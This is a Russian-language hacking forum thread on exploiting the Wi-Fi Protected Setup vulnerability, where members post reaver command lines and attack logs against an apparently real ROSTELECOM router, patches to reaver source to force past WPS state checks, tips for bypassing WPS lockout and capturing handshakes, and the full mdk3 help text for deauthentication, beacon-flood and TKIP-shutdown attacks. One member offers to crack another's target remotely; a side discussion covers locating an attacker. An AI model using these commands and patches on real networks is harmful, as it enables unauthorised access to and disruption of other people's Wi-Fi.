Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    Там точно pin пустой, а почему key не показывает - надо включать более подробный лог - в файле wpa_debug.c
    int wpa_debug_level = MSG_INFO;
    int wpa_debug_show_keys = 0;
    поменять на
    int wpa_debug_level = 0;
    int wpa_debug_show_keys = 1;

    Upd: Похоже, что когда E-Hash1==E-Hash2, то первым делом надо проверять на пустой pin
     
    #3921 VasiliyP, 29 Mar 2017
    Last edited: 29 Mar 2017
    binarymaster likes this.
    1. startless

      startless Member

      Joined:
      20 Jun 2015
      Messages:
      135
      Likes Received:
      96
      Reputations:
      0
      [!] WPS transaction failed (code: 0x03), re-trying last pin
      [+] Trying pin "�p��p�"
      [!] WPS transaction failed (code: 0x03), re-trying last pin
      Ошибка сегментирования
       
      roofless and binarymaster like this.
      1. binarymaster

        binarymaster Elder - Старейшина

        Joined:
        11 Dec 2010
        Messages:
        4,717
        Likes Received:
        10,195
        Reputations:
        126
        Видимо там, где происходит получение строки из get_static_p1(), нужно делать её дубликат, т.е. обернуть в strdup().
        Интересное наблюдение!
         
        1. startless

          startless Member

          Joined:
          20 Jun 2015
          Messages:
          135
          Likes Received:
          96
          Reputations:
          0
          root@kali:~/reaver/src# ./reaver -i wlan0mon -b D4:76:EA:xx:xx:xx -c 6 -vvv -p "" -N

          Reaver v1.5.3 WiFi Protected Setup Attack Tool
          Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
          mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & AAnarchYY & KokoSoft

          [+] Switching wlan0mon to channel 6
          [+] Waiting for beacon from D4:76:EA:xx:xx:xx
          [+] Associated with D4:76:EA:xx:xx:xx (ESSID: ROSTELECOM-xx)
          [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
          WPS: A new PIN configured (timeout=0)
          WPS: UUID - hexdump(len=16): [NULL]
          WPS: PIN - hexdump_ascii(len=0):
          WPS: Selected registrar information changed
          WPS: Internal Registrar selected (pbc=0)
          WPS: sel_reg_union
          WPS: set_ie
          WPS: cb_set_sel_reg
          WPS: Enter wps_cg_set_sel_reg
          WPS: Leave wps_cg_set_sel_reg early
          WPS: return from wps_selected_registrar_changed
          [+] Trying pin ""
          [+] Sending EAPOL START request
          [!] WARNING: Receive timeout occurred
          [+] Sending EAPOL START request
          [+] Received identity request
          WPS: Processing received message (len=539 op_code=4)
          WPS: Received WSC_MSG
          WPS: attr type=0x104a len=1

          .................................

          [+] Received M5 message
          WPS: Processing received message (len=158 op_code=4)
          WPS: Received WSC_MSG
          WPS: attr type=0x104a len=1
          WPS: attr type=0x1022 len=1
          WPS: attr type=0x1039 len=16
          WPS: attr type=0x1018 len=112
          WPS: attr type=0x1005 len=8
          WPS: Parsed WSC_MSG
          WPS: Received M7
          WPS: Unexpected state (12) for receiving M7
          WPS: WPS_CONTINUE, Freeing Last Message
          WPS: WPS_CONTINUE, Saving Last Message
          WPS: returning
          [+] Received M7 message
          WPS: Building Message WSC_NACK
          WPS: * Version
          WPS: * Message Type (14)
          WPS: * Enrollee Nonce
          WPS: * Registrar Nonce
          WPS: * Configuration Error (0)
          [+] Sending WSC NACK
          WPS: Building Message WSC_NACK
          WPS: * Version
          WPS: * Message Type (14)
          WPS: * Enrollee Nonce
          WPS: * Registrar Nonce
          WPS: * Configuration Error (0)
          [+] Sending WSC NACK
          [+] Pin cracked in 15 seconds
          [+] WPS PIN: ''
          [+] Nothing done, nothing to save.
          WPS: Full PIN information revealed and negotiation failed
          WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 41 44 53 4c 20 4d

          Внес свежие изменения, пересобрал. Пароль не сдает.
           
          1. VasiliyP

            VasiliyP Elder - Старейшина

            Joined:
            30 Aug 2011
            Messages:
            365
            Likes Received:
            676
            Reputations:
            11
            А попробуйте в файле wps_registrar.c заменить строчку
            if (wps->state != RECV_M7) {
            на
            if (0) {
            Авось поможет. Постоянные повторы принятых пакетов - это может быть и с адаптером связано.
             
            1. startless

              startless Member

              Joined:
              20 Jun 2015
              Messages:
              135
              Likes Received:
              96
              Reputations:
              0
              Попробовал. Без изменений.
               
              1. Elusive

                Elusive New Member

                Joined:
                8 Jan 2011
                Messages:
                3
                Likes Received:
                1
                Reputations:
                0
                Почитал тему, возник вопрос, есть ли решение обойти wps lock на tp link (С0:4A:00)
                При обычном переборе возникает
                Code:
                warning: detected ap rate limiting, waiting 60 seconds before re-checking
                Пробовал mdk3,выдает
                Code:
                mdk3 device seems to be invulnerable
                .
                Если увел время между перебором или еще что-то, толк от этого будет?

                wifislax 4.12. (722n)
                 
                1. Andrey9999

                  Andrey9999 Elder - Старейшина

                  Joined:
                  23 May 2012
                  Messages:
                  3,138
                  Likes Received:
                  30,811
                  Reputations:
                  71
                  с WPS вряд ли что-то получится
                  ловите хендшейк...
                   
                  1. VasiliyP

                    VasiliyP Elder - Старейшина

                    Joined:
                    30 Aug 2011
                    Messages:
                    365
                    Likes Received:
                    676
                    Reputations:
                    11
                    Некоторые tp-link выставляют флаг locked, но wps продолжает работать. В reaver для этой ситуации есть флаг -L.
                    Если же все методы (хендшейк в т.ч.) окажутся безуспешными, могу попробовать его раскрутить, после того, как разлочится. Для этого нужен ssh сервер, и устойчивый сигнал с/до цели. По времени - примерно как reaver'ом.
                     
                    1. startless

                      startless Member

                      Joined:
                      20 Jun 2015
                      Messages:
                      135
                      Likes Received:
                      96
                      Reputations:
                      0
                      Насколько я понял из вашей с ним переписки, у вас нет доступа к вебке таких роутеров? Если помогу организовать такой доступ, дело шустрее пойдет?

                      Только сейчас заметил, то в теме про роутерскан эти точки уже изучаются...
                       
                      #3930 startless, 5 Apr 2017
                      Last edited: 5 Apr 2017
                      1. binarymaster

                        binarymaster Elder - Старейшина

                        Joined:
                        11 Dec 2010
                        Messages:
                        4,717
                        Likes Received:
                        10,195
                        Reputations:
                        126
                        Учитывая, что относительно недавно была выложена последняя ночная сборка RS, я переключился на другое. Но писать в ту тему смысл есть, возможно кто-нибудь из нашей команды реализует.
                         
                        startless likes this.
                        1. startless

                          startless Member

                          Joined:
                          20 Jun 2015
                          Messages:
                          135
                          Likes Received:
                          96
                          Reputations:
                          0
                          Я тут только что прошелся как раз новой сборкой по своему региону и обнаружил несколько десятков таких точек. Они не совсем корректно парсятся. Запостил в ветку роутерскана. Сейчас добавлю туда еще список таких же точек на случай, если та исчезнет.
                           
                          roofless likes this.
                          1. startless

                            startless Member

                            Joined:
                            20 Jun 2015
                            Messages:
                            135
                            Likes Received:
                            96
                            Reputations:
                            0
                            Есть подозрение, что кто-то пытается ломануть мой wi-fi, ибо периодически сеть падает и тут же появляется, судя по индикации на андрюше. Стало быть, ловит хендшейк. Вопрос! Как вычислить негодяя?
                             
                            1. Kakoluk

                              Kakoluk Banned

                              Joined:
                              14 Aug 2015
                              Messages:
                              514
                              Likes Received:
                              704
                              Reputations:
                              4
                              Вот значит вы как, да? Теперь значит, негодяи? :D
                              Отследить очень тяжело, даже с помощью спецоборудования. Процесс деаутентификации очень короток(слишком мало времени для лоцирования), остальное время "негодяй" слушает(принимает) а не говорит(передаёт).
                              Хотя, если вы профессионально играете в "Охоту на лиc" .. всё возможно. ;)
                              Другой случай, если у вас длительно пытаются получить хендшейк(а не получается) например с помощью MDK3, замусоривая эфир. Тогда проще. Есть время лоцировать источник.
                               
                              #3934 Kakoluk, 12 Apr 2017
                              Last edited: 12 Apr 2017
                              quite gray and TOX1C like this.
                              1. TOX1C

                                TOX1C Elder - Старейшина

                                Joined:
                                24 Mar 2012
                                Messages:
                                1,135
                                Likes Received:
                                1,931
                                Reputations:
                                24
                                Такое же бывает, когда у роутера или в его блоке питания конденсаторы пересыхают от старости.
                                 
                                quite gray and Kakoluk like this.
                                1. startless

                                  startless Member

                                  Joined:
                                  20 Jun 2015
                                  Messages:
                                  135
                                  Likes Received:
                                  96
                                  Reputations:
                                  0
                                  Я же шутю! Сам такой же негодяй :D. Просто интересно стало, как повернуть процесс вспять и попытаться вычислить "лису". Тем самым и себя обезопасить.
                                  Кстати, в commview для wifi, помню, есть такая функция, когда прога рисует схему взаимодействия узлов на основе анализа мониторинга пакетов. Только вот мой текущий адаптер она не поддерживает. Может в кали есть что-то подобное?
                                  Да, роутер оказался в порядке и кондеры живые. Какая-то ошибка в конфиге. Дефолтнул, загрузил сохраненный конфиг - опять сигнал пляшет. Снова дефолт, ручками прописываю настройки - все, полет нормальный.
                                   
                                  1. Naurlock

                                    Naurlock New Member

                                    Joined:
                                    6 Apr 2017
                                    Messages:
                                    5
                                    Likes Received:
                                    1
                                    Reputations:
                                    0
                                    Оч. интересно как это можно сделать? расскажете или мож ткнёте куда почитать?)
                                     
                                    1. Kakoluk

                                      Kakoluk Banned

                                      Joined:
                                      14 Aug 2015
                                      Messages:
                                      514
                                      Likes Received:
                                      704
                                      Reputations:
                                      4
                                      MDK 3.0 v6 - "Yeah, well, whatever"
                                      by ASPj of k2wrlz, using the osdep library from aircrack-ng
                                      And with lots of help from the great aircrack-ng community:
                                      Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape,
                                      telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik
                                      THANK YOU!

                                      MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
                                      IMPORTANT: It is your responsibility to make sure you have permission from the
                                      network owner before running MDK against it.

                                      This code is licenced under the GPLv2

                                      MDK USAGE:
                                      mdk3 <interface> <test_mode> [test_options]

                                      Try mdk3 --fullhelp for all test options
                                      Try mdk3 --help <test_mode> for info about one test only

                                      TEST MODES:
                                      b - Beacon Flood Mode
                                      Sends beacon frames to show fake APs at clients.
                                      This can sometimes crash network scanners and even drivers!
                                      a - Authentication DoS mode
                                      Sends authentication frames to all APs found in range.
                                      Too much clients freeze or reset some APs.
                                      p - Basic probing and ESSID Bruteforce mode
                                      Probes AP and check for answer, useful for checking if SSID has
                                      been correctly decloaked or if AP is in your adaptors sending range
                                      SSID Bruteforcing is also possible with this test mode.
                                      d - Deauthentication / Disassociation Amok Mode
                                      Kicks everybody found from AP
                                      m - Michael shutdown exploitation (TKIP)
                                      Cancels all traffic continuously
                                      x - 802.1X tests
                                      w - WIDS/WIPS Confusion
                                      Confuse/Abuse Intrusion Detection and Prevention Systems
                                      f - MAC filter bruteforce mode
                                      This test uses a list of known client MAC Adresses and tries to
                                      authenticate them to the given AP while dynamically changing
                                      its response timeout for best performance. It currently works only
                                      on APs who deny an open authentication request properly
                                      g - WPA Downgrade test
                                      deauthenticates Stations and APs sending WPA encrypted packets.
                                      With this test you can check if the sysadmin will try setting his
                                      network to WEP or disable encryption.









                                      MDK 3.0 v6 - "Yeah, well, whatever"
                                      by ASPj of k2wrlz, using the osdep library from aircrack-ng
                                      And with lots of help from the great aircrack-ng community:
                                      Antragon, moongray, Ace, Zero_Chaos, Hirte, thefkboss, ducttape,
                                      telek0miker, Le_Vert, sorbo, Andy Green, bahathir and Dawid Gajownik
                                      THANK YOU!

                                      MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
                                      IMPORTANT: It is your responsibility to make sure you have permission from the
                                      network owner before running MDK against it.

                                      This code is licenced under the GPLv2

                                      MDK USAGE:
                                      mdk3 <interface> <test_mode> [test_options]

                                      Try mdk3 --fullhelp for all test options
                                      Try mdk3 --help <test_mode> for info about one test only

                                      TEST MODES:
                                      b - Beacon Flood Mode
                                      Sends beacon frames to show fake APs at clients.
                                      This can sometimes crash network scanners and even drivers!
                                      a - Authentication DoS mode
                                      Sends authentication frames to all APs found in range.
                                      Too much clients freeze or reset some APs.
                                      p - Basic probing and ESSID Bruteforce mode
                                      Probes AP and check for answer, useful for checking if SSID has
                                      been correctly decloaked or if AP is in your adaptors sending range
                                      SSID Bruteforcing is also possible with this test mode.
                                      d - Deauthentication / Disassociation Amok Mode
                                      Kicks everybody found from AP
                                      m - Michael shutdown exploitation (TKIP)
                                      Cancels all traffic continuously
                                      x - 802.1X tests
                                      w - WIDS/WIPS Confusion
                                      Confuse/Abuse Intrusion Detection and Prevention Systems
                                      f - MAC filter bruteforce mode
                                      This test uses a list of known client MAC Adresses and tries to
                                      authenticate them to the given AP while dynamically changing
                                      its response timeout for best performance. It currently works only
                                      on APs who deny an open authentication request properly
                                      g - WPA Downgrade test
                                      deauthenticates Stations and APs sending WPA encrypted packets.
                                      With this test you can check if the sysadmin will try setting his
                                      network to WEP or disable encryption.


                                      b - Beacon Flood Mode
                                      Sends beacon frames to show fake APs at clients.
                                      This can sometimes crash network scanners and even drivers!
                                      OPTIONS:
                                      -n <ssid>
                                      Use SSID <ssid> instead of randomly generated ones
                                      -f <filename>
                                      Read SSIDs from file
                                      -v <filename>
                                      Read MACs and SSIDs from file. See example file!
                                      -d
                                      Show station as Ad-Hoc
                                      -w
                                      Set WEP bit (Generates encrypted networks)
                                      -g
                                      Show station as 54 Mbit
                                      -t
                                      Show station using WPA TKIP encryption
                                      -a
                                      Show station using WPA AES encryption
                                      -m
                                      Use valid accesspoint MAC from OUI database
                                      -h
                                      Hop to channel where AP is spoofed
                                      This makes the test more effective against some devices/drivers
                                      But it reduces packet rate due to channel hopping.
                                      -c <chan>
                                      Fake an AP on channel <chan>. If you want your card to hop on
                                      this channel, you have to set -h option, too!
                                      -s <pps>
                                      Set speed in packets per second (Default: 50)
                                      a - Authentication DoS mode
                                      Sends authentication frames to all APs found in range.
                                      Too much clients freeze or reset almost every AP.
                                      OPTIONS:
                                      -a <ap_mac>
                                      Only test the specified AP
                                      -m
                                      Use valid client MAC from OUI database
                                      -c
                                      Do NOT check for test being successful
                                      -i <ap_mac>
                                      Perform intelligent test on AP (-a and -c will be ignored)
                                      This test connects clients to the AP and reinjects sniffed data to keep them alive
                                      -s <pps>
                                      Set speed in packets per second (Default: unlimited)
                                      p - Basic probing and ESSID Bruteforce mode
                                      Probes AP and check for answer, useful for checking if SSID has
                                      been correctly decloaked or if AP is in your adaptors sending range
                                      Use -f and -t option to enable SSID Bruteforcing.
                                      OPTIONS:
                                      -e <ssid>
                                      Tell mdk3 which SSID to probe for
                                      -f <filename>
                                      Read lines from file for bruteforcing hidden SSIDs
                                      -t <bssid>
                                      Set MAC adress of target AP
                                      -s <pps>
                                      Set speed (Default: unlimited, in Bruteforce mode: 300)
                                      -b <character set>
                                      Use full Bruteforce mode (recommended for short SSIDs only!)
                                      Use this switch only to show its help screen.
                                      d - Deauthentication / Disassociation Amok Mode
                                      Kicks everybody found from AP
                                      OPTIONS:
                                      -w <filename>
                                      Read file containing MACs not to care about (Whitelist mode)
                                      -b <filename>
                                      Read file containing MACs to run test on (Blacklist Mode)
                                      -s <pps>
                                      Set speed in packets per second (Default: unlimited)
                                      -c [chan,chan,chan,...]
                                      Enable channel hopping. Without providing any channels, mdk3 will hop an all
                                      14 b/g channels. Channel will be changed every 5 seconds.
                                      m - Michael shutdown exploitation (TKIP)
                                      Cancels all traffic continuously
                                      -t <bssid>
                                      Set Mac address of target AP
                                      -w <seconds>
                                      Seconds between bursts (Default: 10)
                                      -n <ppb>
                                      Set packets per burst (Default: 70)
                                      -j
                                      Use the new TKIP QoS-Exploit
                                      Needs just a few packets to shut AP down!
                                      -s <pps>
                                      Set speed (Default: 400)
                                      x - 802.1X tests
                                      0 - EAPOL Start packet flooding
                                      -n <ssid>
                                      Use SSID <ssid>
                                      -t <bssid>
                                      Set MAC address of target AP
                                      -w <WPA type>
                                      Set WPA type (1: WPA, 2: WPA2/RSN; default: WPA)
                                      -u <unicast cipher>
                                      Set unicast cipher type (1: TKIP, 2: CCMP; default: TKIP)
                                      -m <multicast cipher>
                                      Set multicast cipher type (1: TKIP, 2: CCMP; default: TKIP)
                                      -s <pps>
                                      Set speed (Default: 400)
                                      1 - EAPOL Logoff test
                                      -t <bssid>
                                      Set MAC address of target AP
                                      -c <bssid>
                                      Set MAC address of target STA
                                      -s <pps>
                                      Set speed (Default: 400)
                                      w - WIDS/WIPS/WDS Confusion
                                      Confuses a WDS with multi-authenticated clients which messes up routing tables
                                      -e <SSID>
                                      SSID of target WDS network
                                      -c [chan,chan,chan...]
                                      Use channel hopping
                                      -z
                                      activate Zero_Chaos' WIDS exploit
                                      (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
                                      f - MAC filter bruteforce mode
                                      This test uses a list of known client MAC Adresses and tries to
                                      authenticate them to the given AP while dynamically changing
                                      its response timeout for best performance. It currently works only
                                      on APs who deny an open authentication request properly
                                      -t <bssid>
                                      Target BSSID
                                      -m <mac>
                                      Set the MAC adress range to use (3 bytes, i.e. 00:12:34)
                                      Without -m, the internal database will be used
                                      -f <mac>
                                      Set the MAC adress to begin bruteforcing with
                                      (Note: You can't use -f and -m at the same time)
                                      g - WPA Downgrade test
                                      deauthenticates Stations and APs sending WPA encrypted packets.
                                      With this test you can check if the sysadmin will try setting his
                                      network to WEP or disable encryption. mdk3 will let WEP and unencrypted
                                      clients work, so if the sysadmin simply thinks "WPA is broken" he
                                      sure isn't the right one for this job.
                                      (this can/should be combined with social engineering)
                                      -t <bssid> Target network
                                      Прослушиваем эфир в мониторе, видим подозрительную активность связанную с вашим BSSID(чужой(ие) клиент(ы)),
                                      ходим с ноутбуком по подъезду с прицелом на уровень сигнала этого клиента(ов) и находим максимум сигнала перед одной из хат.
                                      Если это фейк-точка(с вашим BSSID) то сложнее, можно запутатся в уровнях сигнала вашей точки и паразитной.
                                      Придётся начать от противного, отойти подальше от своего местоположения, и намеренно искать максимум "своего" сигнала, при этом стараясь НЕ приближаться к себе(к вашей точке). Слепой поиск(ощупывание по кругу). Лучше всего в этот момент выключить вашу AP и просто поискать(по уровню сигнала) точку с вашим "BSSID". Это и будет "лиса".
                                      Что то в этом роде, если нет направленных антенн(только ноут с "всенаправленой" антенной в крышке монитора). :)
                                      А вообще, по идее можно программу написать - которая бы автоматизировала такой процесс наблюдения, а если ещё и узконаправленную антенну прикрутить! :D
                                       
                                      #3938 Kakoluk, 13 Apr 2017
                                      Last edited: 13 Apr 2017
                                      1. Naurlock

                                        Naurlock New Member

                                        Joined:
                                        6 Apr 2017
                                        Messages:
                                        5
                                        Likes Received:
                                        1
                                        Reputations:
                                        0
                                        Ну вообще, да) логично, я уж думал, там что-то сверх запутанное с использованием спец.средств.спасибо!
                                         
                                        1. Kakoluk

                                          Kakoluk Banned

                                          Joined:
                                          14 Aug 2015
                                          Messages:
                                          514
                                          Likes Received:
                                          704
                                          Reputations:
                                          4
                                          Спец.средства, в этом случае(просто название узкоспециализированного оборудования) - это остронаправленная антенна+заточенное для локации оборудование.
                                          Им может быть и обычный ноутбук с соответствующим ПО.